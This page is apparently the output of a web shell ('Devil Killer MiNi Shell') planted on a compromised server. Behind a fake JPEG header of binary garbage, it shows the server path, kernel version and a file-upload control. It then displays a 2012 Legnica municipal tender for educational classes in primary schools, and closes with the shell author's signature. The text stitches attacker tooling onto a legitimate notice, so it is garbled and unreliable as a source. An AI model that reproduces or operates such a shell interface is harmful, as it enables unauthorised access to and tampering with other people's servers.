JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/483306-N-2012.html

<p class="kh_header"><b>Legnica: Zakup usług edukacyjnych- prowadzenie zajęć w szkołach podstawowych w klasach 
I-III - projekt DOBRY START W SZKOLE współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki -prowadzenie zajęć w 12 szkołach</b><br>
<b>Numer ogłoszenia: 483306 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.legnica.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych- prowadzenie zajęć w szkołach podstawowych w klasach 
I-III - projekt DOBRY START W SZKOLE współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki -prowadzenie zajęć w 12 szkołach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.
Prowadzenie zajęć w 12 niżej wymienionych szkołach podstawowych w klasach 
I-III w ramach  realizacji projektu DOBRY START W SZKOLE współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki
- Szkoła Podstawowa nr 1 im. Powstańców Wielkopolskich, ul. Kamienna 20A, 59-220 Legnica,
- Szkoła Podstawowa nr 2, ul. Głogowska 50, 59-220 Legnica,
- Szkoła Podstawowa nr 4 im. Włodzimierza Puchalskiego, ul. Piastowska 3, 
59-220 Legnica,
- Szkoła Podstawowa nr 6 im. Henryka Sienkiewicza, Al. Piłsudskiego 3, 
59-220 Legnica,
- Szkoła Podstawowa nr 7 im. Konstantego Ildefonsa Gałczyńskiego, ul. Polarna 1, 59-220 Legnica,
- Szkoła Podstawowa nr 9, ul. Marynarska 31, 59-220 Legnica,
- Szkoła Podstawowa nr 10 im. Zofii Kossak, ul. Jaworzyńska 47, 59-220 Legnica,
- Szkoła Podstawowa nr 16 im. Kornela Makuszyńskiego, ul. Tatrzańska 9, 
59-220 Legnica,
- Szkoła Podstawowa nr 18, im. Jana Brzechwy, ul. Grabskiego 5, 59-220 Legnica,
- Szkoła Podstawowa nr 19, Al. Rzeczypospolitej 129, 59-220 Legnica,
- Szkoła Podstawowa Nr 20 w Zespole Szkół Integracyjnych im. Piastów Śląskich, 
     ul. Wierzyńskiego 1, 59-220 Legnica,
- Ogólnokształcąca Szkoła Muzyczna I stopnia w Zespole Szkół Muzycznych, ul. Chojnowska 2, 59-220 Legnica,
w poniższych 109 częściach:

Zad.1
organizacja w poszczególnych SP zajęć dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym dla zagrożonych dysleksją - w sumie 674 godziny: (674 godz.lekcyjnych - 45 min.):
część 1 - 30 godz. w OSM I 
część 2 - 30 godz. w SP1 
część 3 - 30 godz. w SP1 
część 4 - 30 godz. w SP1 
część 5 - 30 godz. w SP2
część 6 -  30 godz. w SP2
część 7 - 30 godz. w SP4
część 8 - 30 godz. w SP4
część 9 - 30 godz. w SP6
część 10 - 30 godz. w SP6
część 11 - 30 godz. w SP 7
część12 - 30 godz. w SP7
część 13 - 30 godz. w SP9 
część 14 - 30 godz. w SP10 
część 15 - 30 godz. w SP 16
część 16 - 30 godz. w SP 16
część 17 - 30 godz. w SP 16
część 18 - 30 godz. w SP 18
część 19 - 30 godz. w SP19
część 20 - 14 godz. (kontynuacja zajęć z 2 grupami, które zaczęły zajęcia w I sem.) w SP19
część 21 - 30 godz. w SP20
część 22 - 30 godz. w SP20
część 23 - 30 godz. w SP20

Zad.2
organizacja w poszczególnych SP zajęć dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (390 godz. lekcyjnych- po 45 min.) 
część 24 - 30 godz. w SP 1 
część 25 - 30 godz. w SP2 
część 26 - 30 godz. w SP4 
część 27 - 30 godz. w SP6
część 28 - 30 godz. w SP 6
część 29 - 30 godz. w SP9 
część 30 - 30 godz. w SP16
część 31 - 30 godz. w SP16
część 32 - 30 godz. w SP18
część 33 - 30 godz. w SP19
część 34 - 30 godz. w SP20
część 35 - 30 godz. w SP20
część 36 - 30 godz. w SP20

Zad. 3
organizacja zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy (690 godz. zegarowych - 60 min.): 
część 37 - 30 godz. w OSM I
część 38 - 30 godz. w SP1
część 39 - 30 godz. w SP1
część 40 - 30 godz. w SP 2
część 41 - 30 godz. w SP 2
część 42 - 30 godz. w SP4 
część 43 - 30 godz. w SP6 
część 44 - 30 godz. w SP6
część 45 - 30 godz. w SP7
część 46 - 30 godz. w SP7
część 47 - 30 godz. w SP7
część 48 - 30 godz. w SP7
część 49 - 30 godz. w SP9 
część 50 - 30 godz. w SP9 
część 51 - 30 godz. w SP10
część 52 - 30 godz. w SP16
część 53 - 30 godz w SP16 
część 54 - 30 godz. w SP16
część 55 - 30 godz. w SP18
część 56 - 30 godz. w SP18
część 57 - 30 godz. w SP18
część 58 - 30 godz. w SP20
część 59 - 30 godz. w SP20

Zad. 4
organizacja zajęć socjoterapeutycznych i psychoedukacyjnych dla dzieci z zaburzeniami komunikacji społecznej (330 godz. zegarowych - 60 min.):
część 60 - 30 godz. w SP1
część 61 - 30 godz. w SP7
część 62 - 30 godz. w SP9
część 63 - 30 godz. w SP9
część 64 - 30 godz. w SP10 
część 65 - 30 godz. w SP16
część 66 - 30 godz. w SP16
część 67 - 30 godz. w SP18
część 68 - 30 godz. w SP18
część 69 - 30 godz. w SP20
część 70 - 30 godz. w SP20

Zad. 5
organizacja zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy (540 godz. zegarowych - 60 min.)
część 71 - 30 godz. w OSM I 
część 72 - 30 godz. w SP2 
część 73 - 30 godz. w SP4
część 74 - 30 godz. w SP7
część 75 - 30 godz. w SP7
część 76 - 30 godz. w SP7
część 77 - 30 godz. w SP9
część 78 - 30 godz. w SP9
część 79 - 30 godz. w SP9
część 80 - 30 godz. w SP10
część 81 - 30 godz. w SP16 
część 82 - 30 godz. w SP16
część 83 - 30 godz. w SP18
część 84 - 30 godz. w SP19
część 85 - 30 godz. w SP20
część 86 - 30 godz. w SP20
część 87 - 30 godz. w SP20
część 88 - 30 godz. w SP20

Zad. 6 
organizacja zajęć rozwijających zainteresowania uczniów, ze szczególnym uwzględnieniem nauk matematyczno - przyrodnicznych (420 godz. lekcyjnych - 45 min.): 
część 89 - 30 godz. w OSM I
część 90 - 30 godz. w  SP1
część 91 - 30 godz. w SP2 
część 92 - 30 godz. w SP4
część 93 - 30 godz. w SP 4 
część 94 - 30 godz. w SP6
część 95 - 30 godz. w SP7
część 96 - 30 godz. w SP9
część 97 - 30 godz. w SP10 
część 98 - 30 godz. w SP16 
część 99 - 30 godz. w SP18 
część 100 - 30 godz. w SP19 
część 101 - 30 godz. w SP20
część 102 - 30 godz. w SP20

Zad. 7
organizacja zajęć rozwijających zainteresowania dla uczniów uzdolnionych artystycznie (90 godz. lekcyjnych - 45 min.):
część 103 - 30 godz. w SP1
część 104 - 30 godz. w SP2
część 105 - 30 godz. w SP4

Zad. 8
organizacja zajęć rozwijających zainteresowania uczniów uzdolnionych muzycznie (60 godz. lekcyjnych - 45 min.):
część 106 - 30 godz. w SP16
część 107 - 30 godz. w SP 16

Zad.9
organizacja zajęć terapeutycznych - muzykoterapia, logorytmika (60 godz. zegarowych - 60 min.)
część 108 - 30 godz. w SP 20
część 109 - 30 godz. w SP 20
 
Dodatkowo wszystkim uczestnikom zajęć zostaną przekazane treści nt. równości szans i płci.

II.
Poza przeprowadzeniem zajęć Wykonawca zobowiązany jest do:
-  opracowania indywidualnych bądź w określonych przypadkach grupowych (dla dzieci o tych samych potrzebach edukacyjnych) programów indywidualizacji nauczania i pracy w oparciu o nie,
-prowadzenia bieżącej dokumentacji z realizowanych zajęć poprzez: systematyczne wypełnianie dziennika zajęć pozalekcyjnych, a także sporządzanie wszelkich innych bieżących informacji na temat realizacji projektu na prośbę Zamawiającego,
-udział w zebraniach, spotkaniach i szkoleniach dot. projektu organizowanych przez Zamawiającego,
-przeprowadzenia diagnozy edukacyjnych potrzeb dzieci na wstępie oraz po każdym zakończonym cyklu zajęć (semestrze) oraz sporządzenia raportu z przeprowadzonej diagnozy. Celem obserwacji będzie pomiar rezultatów w projekcie.
-informowania rodziców o postępach dzieci w nauce i zachowaniu (podczas zebrań z rodzicami 
i konsultacji)
-stosowania zasady równości szans w projekcie.

Wykonawca może złożyć ofertę na jedną część, na kilka części  bądź na wszystkie części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 109.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają  poniższy warunek udziału w postępowaniu:
Dysponują osobami zdolnymi do wykonania zamówienia tj. mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej  stanowisk:
a) osoby posiadające:
- kwalifikacje zgodne z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50 poz. 400 z późniejszymi zmianami),   
- doświadczenie min 6 miesięcy pracy-prowadzenia zajęć  z dziećmi w klasach 0-III szkoły podstawowej.
Ocena spełnienia warunku według :
1)  oświadczenia Wykonawcy- załącznik nr 1 do  Instrukcji dla Wykonawców- Rozdział 2 specyfikacji istotnych warunków zamówienia
2) wykazu osób, które będą uczestniczyć   w  wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji  zawodowych, wykształcenia i doświadczenia  niezbędnych do wykonania zamówienia,  a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania  tymi osobami - załącznik nr 3 do  Instrukcji dla Wykonawców- Rozdział 2 specyfikacji istotnych warunków zamówienia
3) oświadczenia, że wskazane  w załączniku nr 3 osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają ww. wymagane  kwalifikacje zawodowe, wykształcenie i doświadczenie - wraz z informacjami potwierdzającymi ww. wymagane kwalifikacje zawodowe, wykształcenie potwierdzone np. dyplomem, świadectwem, zaświadczeniami o ukończonych kursach, cv, itp. 
i doświadczenie potwierdzone  np. oświadczeniem pracodawcy, umową o pracę, świadectwem pracy, cv,  itp.- załącznik  nr 5 do  Instrukcji dla Wykonawców- Rozdział 2 specyfikacji istotnych warunków zamówienia


Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia   


Wskazana jest dyspozycyjność umożliwiająca: prowadzenie zajęć przed i po lekcjach obowiązkowych w klasach I-III (w godzinach porannych i wczesnych popołudniowych) w zależności od możliwości organizacyjnych szkół, udział w zebraniach z rodzicami i konsultacjach, osób uczestniczących w wykonaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Formularz oferty wg załączonego druku  Rozdziału  Nr 1 specyfikacji istotnych warunków zamówienia.
2. Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg załącznika nr 1 do Instrukcji dla Wykonawców - Rozdział Nr 2 specyfikacji istotnych warunków zamówienia.
3.  Oświadczenie, że wskazane  w załączniku nr 3 osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają ww. wymagane  kwalifikacje zawodowe, wykształcenie i doświadczenie -  wraz z informacjami potwierdzającymi ww. wymagane kwalifikacje zawodowe, wykształcenie potwierdzone np. dyplomem, świadectwem, zaświadczeniami o ukończonych kursach, cv, itp. 
i doświadczenie potwierdzone  np. oświadczeniem pracodawcy, umową o pracę, świadectwem pracy, cv,  itp.- wg załącznika  nr 5 do  Instrukcji dla Wykonawców- Rozdział 2 specyfikacji istotnych warunków zamówienia
4. Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg załącznika nr 4 do Instrukcji dla Wykonawców - Rozdział  2 specyfikacji istotnych warunków zamówienia.
5.  Wypełnioną umowę  wg Rozdziału  3 specyfikacji istotnych warunków zamówienia  -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
6. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
7. W sytuacji gdy Wykonawca, zgodnie z art. 26  ust 2b w zakresie warunków określonych w pkt. 13 Instrukcji dla Wykonawców- Rozdział 2 specyfikacji istotnych warunków zamówienia polegał będzie na osobach zdolnych  wykonania zamówienia innych podmiotów, niezależnie od charakteru  prawnego łączących go z nim stosunków, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.legnica.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Legnica, Plac Słowiański 7 , pokój nr 22- Referat Zamówień  Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 13:00, miejsce: Urząd Miasta Legnica, Plac Słowiański 8 , pokój nr 208..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane - projekt DOBRY START W SZKOLE współfinansowany z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com